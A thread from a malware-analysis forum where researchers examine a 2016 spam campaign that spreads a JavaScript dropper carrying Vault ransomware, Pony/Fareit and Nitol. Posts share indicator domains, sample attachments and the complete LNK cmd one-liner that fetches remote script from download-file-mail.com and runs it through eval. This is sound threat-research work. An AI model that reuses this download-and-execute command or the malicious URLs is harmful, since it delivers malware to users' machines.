A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #28684  by Xylitol
 Wed Jun 15, 2016 8:26 am
 #28695  by EP_X0FF
 Fri Jun 17, 2016 8:03 am
Delivers via spam. Includes cryptolocker and bunch of additional trojans.

hxxp://alyns-medvejii-ugol.ru/?d

Original filename
Документация для контрагента от 14.06.2016. Согласовано и подписано с директором. Экспртировано из 1С-Бухгалтерия.docx.js
Muldrop trojan and it payload (Fareit + Nitol both packed with UPX to reduce their size in dropper) in attach.

Note: Despite almost FUD of muldrop, Microsoft Windows Defender will be able to detect and kill it (because of memory scan), but only if installation process will lag enough at JS dropper stage. After this system will be fucked.
Attachments
pass: infected
(169.59 KiB) Downloaded 80 times
 #28697  by Antelox
 Fri Jun 17, 2016 11:02 am
This should be Vault Ransomware and not RAA. In attachment the beautified javascript with small mods made by me to only drop the executable without run it (it's also drops a fake docx). Anyway the dropped exe seems to be corrupted because it crashes.

Same javascript also from here:
getxsource[.]com
flexured[.]com
Upload form maybe to update the js
getxsource[.]com/upload.php
screen_upload.png
screen_upload.png (5.72 KiB) Viewed 1008 times
BR,

Antelox
infected
(138.48 KiB) Downloaded 66 times
 #28698  by EP_X0FF
 Fri Jun 17, 2016 11:40 am
Have no idea, why your file is broken. In my attach above both dropper and all embedded trojans from it. Also it incorrectly work on Windows XP.

Vault messages
http://pastebin.com/u/vlt
 #28717  by Antelox
 Mon Jun 20, 2016 11:04 am
New domain:
download-file-mail\.com
Now a LNK file downloads and executes the javascript.
Code: Select all
%windir%\system32\cmd.exe /c cd %TEMP%
echo. 2>s.js
echo var r = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");r.open("GET","http://download-file-mail.com/src/src",false);r.send^(^);var b = r.responseText;eval^(b^);>s.js
start s.js
LNK: https://virustotal.com/en/file/e03b17ee ... /analysis/ - FUD
JS: https://virustotal.com/en/file/ddda0e8d ... /analysis/ - (7/55)
Pony: https://virustotal.com/en/file/3e7950eb ... /analysis/ - (13/55)
Pony panel:
fgfhfjfkfl\.xyz/admin
BR,

Antelox

Dropped files:
Infected
(363.41 KiB) Downloaded 66 times
 #28718  by Antelox
 Mon Jun 20, 2016 12:52 pm
Antelox wrote:This should be Vault Ransomware and not RAA. In attachment the beautified javascript with small mods made by me to only drop the executable without run it (it's also drops a fake docx). Anyway the dropped exe seems to be corrupted because it crashes.

Same javascript also from here:
getxsource[.]com
flexured[.]com
Upload form maybe to update the js
getxsource[.]com/upload.php
The attachment screen_upload.png is no longer available
BR,

Antelox
The attachment beautified_and_modified.js.zip is no longer available
From
flexured[.]com
In attachment:
- original js;
- deobfuscated and modified js to only drop the files (vault dropper and fake docx);
- fake docx
- Vault dropper.

BR,

Antelox
infected
(413.22 KiB) Downloaded 79 times